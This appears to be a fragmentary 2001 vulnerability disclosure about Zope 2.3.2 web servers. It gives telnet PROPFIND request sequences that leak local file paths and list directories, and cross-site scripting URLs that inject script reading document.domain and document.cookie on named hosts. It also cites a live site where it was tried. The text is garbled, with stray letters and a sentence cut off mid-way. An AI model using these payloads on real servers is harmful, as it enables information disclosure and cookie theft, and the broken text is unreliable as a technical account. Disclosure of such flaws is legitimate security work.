Found vulnerability: retrieve a full path to local files in Zope.
---[ Example 1 (Linux):
telnet www.zope.org 80
PROPFIND / HTTP/1.0
F
G
H
J
K
L
HTTP/1.0 500 Internal Server Error
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Mon, 10 Sep 2001 15:38:59 GMT
Example:
http://www.zope.org/Documentation/SCRIPTalert(document.domain)/SCRIPT
http://www.zope.org/lalalalalSCRIPTalert(document.domain)/SCRIPT
http://www.zope.org/SCRIPTalert(document.cookie)/SCRIPT
For example, an attacker might post a message like
Hello message board. This is a
Vulnerability: attacking can get file list and directory
Tested on Win32 platform
Example:
telnet zopeserver 8080
PROPFIND / HTTP/1.0
enter
enter
enter
list files and directory
This tested on my site:
security.instock.ru 8080
___
Zope-Dev